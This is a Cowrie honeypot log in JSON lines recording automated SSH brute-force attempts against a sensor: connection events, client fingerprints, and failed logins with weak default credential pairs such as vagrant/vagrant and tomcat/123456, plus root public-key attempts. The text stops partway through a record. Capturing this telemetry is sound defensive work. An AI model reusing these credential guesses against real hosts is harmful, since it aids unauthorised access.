{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55814,"dst_ip":"1.2.3.4","dst_port":22,"session":"53d85f1b87a8","protocol":"ssh","message":"New connection: 217.154.1.158:55814 (1.2.3.4:22) [session: 53d85f1b87a8]","sensor":"my-vps","timestamp":"2025-08-26T20:10:11.994429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:10:11.995336Z","src_ip":"217.154.1.158","session":"53d85f1b87a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:10:12.010414Z","src_ip":"217.154.1.158","session":"53d85f1b87a8"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:10:12.054893Z","src_ip":"217.154.1.158","session":"53d85f1b87a8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:10:13.072043Z","src_ip":"217.154.1.158","session":"53d85f1b87a8"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":60326,"dst_ip":"1.2.3.4","dst_port":22,"session":"f453ac425fa3","protocol":"ssh","message":"New connection: 199.195.248.191:60326 (1.2.3.4:22) [session: f453ac425fa3]","sensor":"my-vps","timestamp":"2025-08-26T20:10:20.748781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:10:20.749776Z","src_ip":"199.195.248.191","session":"f453ac425fa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:10:20.849390Z","src_ip":"199.195.248.191","session":"f453ac425fa3"}
{"eventid":"cowrie.login.failed","username":"node","password":"node123","message":"login attempt [node/node123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:10:21.243212Z","src_ip":"199.195.248.191","session":"f453ac425fa3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:10:22.340323Z","src_ip":"199.195.248.191","session":"f453ac425fa3"}
{"eventid":"cowrie.session.closed","duration":120.00276064872742,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:10:23.546334Z","src_ip":"112.166.27.182","session":"f733d4bd70cc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52586,"dst_ip":"1.2.3.4","dst_port":22,"session":"451d028244f3","protocol":"ssh","message":"New connection: 217.154.1.158:52586 (1.2.3.4:22) [session: 451d028244f3]","sensor":"my-vps","timestamp":"2025-08-26T20:10:29.487586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:10:29.489183Z","src_ip":"217.154.1.158","session":"451d028244f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:10:29.503523Z","src_ip":"217.154.1.158","session":"451d028244f3"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:10:29.548033Z","src_ip":"217.154.1.158","session":"451d028244f3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:10:30.564468Z","src_ip":"217.154.1.158","session":"451d028244f3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37078,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1fbbfda628a","protocol":"ssh","message":"New connection: 217.154.1.158:37078 (1.2.3.4:22) [session: c1fbbfda628a]","sensor":"my-vps","timestamp":"2025-08-26T20:10:46.955079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:10:46.956167Z","src_ip":"217.154.1.158","session":"c1fbbfda628a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:10:46.970120Z","src_ip":"217.154.1.158","session":"c1fbbfda628a"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:10:47.014940Z","src_ip":"217.154.1.158","session":"c1fbbfda628a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:10:48.030885Z","src_ip":"217.154.1.158","session":"c1fbbfda628a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":34858,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdca8ce64c9c","protocol":"ssh","message":"New connection: 217.154.1.158:34858 (1.2.3.4:22) [session: fdca8ce64c9c]","sensor":"my-vps","timestamp":"2025-08-26T20:11:04.429946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:11:04.431007Z","src_ip":"217.154.1.158","session":"fdca8ce64c9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:11:04.445179Z","src_ip":"217.154.1.158","session":"fdca8ce64c9c"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:11:04.489866Z","src_ip":"217.154.1.158","session":"fdca8ce64c9c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:11:05.509237Z","src_ip":"217.154.1.158","session":"fdca8ce64c9c"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":51836,"dst_ip":"1.2.3.4","dst_port":22,"session":"8461bb69812e","protocol":"ssh","message":"New connection: 139.19.117.131:51836 (1.2.3.4:22) [session: 8461bb69812e]","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.427396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.428425Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.445649Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3c:30:f4:7b:74:d0:96:e8:19:53:c5:8c:58:05:55:7e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDbxGurAqblYahMJOjTpfKkHwxM/YZOtCX+4Cj1PYiE9l4dp4oxxFZoh0T/nkdBtfPBMYMpDcJ5G4Pl1q3s9Arkmpnjl59Kp2WeHcm0/UByViruDgejvDx2BsBHYEcGvxY7OfeBLiV967qdasKSHH66GVWZEu0TGsnbodm6qIaM2Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3c:30:f4:7b:74:d0:96:e8:19:53:c5:8c:58:05:55:7e","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.499067Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3c:30:f4:7b:74:d0:96:e8:19:53:c5:8c:58:05:55:7e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDbxGurAqblYahMJOjTpfKkHwxM/YZOtCX+4Cj1PYiE9l4dp4oxxFZoh0T/nkdBtfPBMYMpDcJ5G4Pl1q3s9Arkmpnjl59Kp2WeHcm0/UByViruDgejvDx2BsBHYEcGvxY7OfeBLiV967qdasKSHH66GVWZEu0TGsnbodm6qIaM2Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.499871Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3c:30:f4:7b:74:d0:96:e8:19:53:c5:8c:58:05:55:7e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDbxGurAqblYahMJOjTpfKkHwxM/YZOtCX+4Cj1PYiE9l4dp4oxxFZoh0T/nkdBtfPBMYMpDcJ5G4Pl1q3s9Arkmpnjl59Kp2WeHcm0/UByViruDgejvDx2BsBHYEcGvxY7OfeBLiV967qdasKSHH66GVWZEu0TGsnbodm6qIaM2Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3c:30:f4:7b:74:d0:96:e8:19:53:c5:8c:58:05:55:7e","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.518868Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3c:30:f4:7b:74:d0:96:e8:19:53:c5:8c:58:05:55:7e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDbxGurAqblYahMJOjTpfKkHwxM/YZOtCX+4Cj1PYiE9l4dp4oxxFZoh0T/nkdBtfPBMYMpDcJ5G4Pl1q3s9Arkmpnjl59Kp2WeHcm0/UByViruDgejvDx2BsBHYEcGvxY7OfeBLiV967qdasKSHH66GVWZEu0TGsnbodm6qIaM2Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:11:10.520283Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:11:20.427471Z","src_ip":"139.19.117.131","session":"8461bb69812e"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59976,"dst_ip":"1.2.3.4","dst_port":22,"session":"490caf1fe848","protocol":"ssh","message":"New connection: 217.154.1.158:59976 (1.2.3.4:22) [session: 490caf1fe848]","sensor":"my-vps","timestamp":"2025-08-26T20:11:21.869015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:11:21.870102Z","src_ip":"217.154.1.158","session":"490caf1fe848"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:11:21.886260Z","src_ip":"217.154.1.158","session":"490caf1fe848"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:11:21.931911Z","src_ip":"217.154.1.158","session":"490caf1fe848"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:11:22.948572Z","src_ip":"217.154.1.158","session":"490caf1fe848"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":34180,"dst_ip":"1.2.3.4","dst_port":22,"session":"b306a19568d6","protocol":"ssh","message":"New connection: 217.154.1.158:34180 (1.2.3.4:22) [session: b306a19568d6]","sensor":"my-vps","timestamp":"2025-08-26T20:11:39.355669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:11:39.357109Z","src_ip":"217.154.1.158","session":"b306a19568d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:11:39.371995Z","src_ip":"217.154.1.158","session":"b306a19568d6"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-26T20:11:39.418488Z","src_ip":"217.154.1.158","session":"b306a19568d6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:11:40.438137Z","src_ip":"217.154.1.158","session":"b306a19568d6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44794,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b3ea12e66fe","protocol":"ssh","message":"New connection: 217.154.1.158:44794 (1.2.3.4:22) [session: 6b3ea12e66fe]","sensor":"my-vps","timestamp":"2025-08-26T20:11:56.901644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:11:56.902531Z","src_ip":"217.154.1.158","session":"6b3ea12e66fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"mac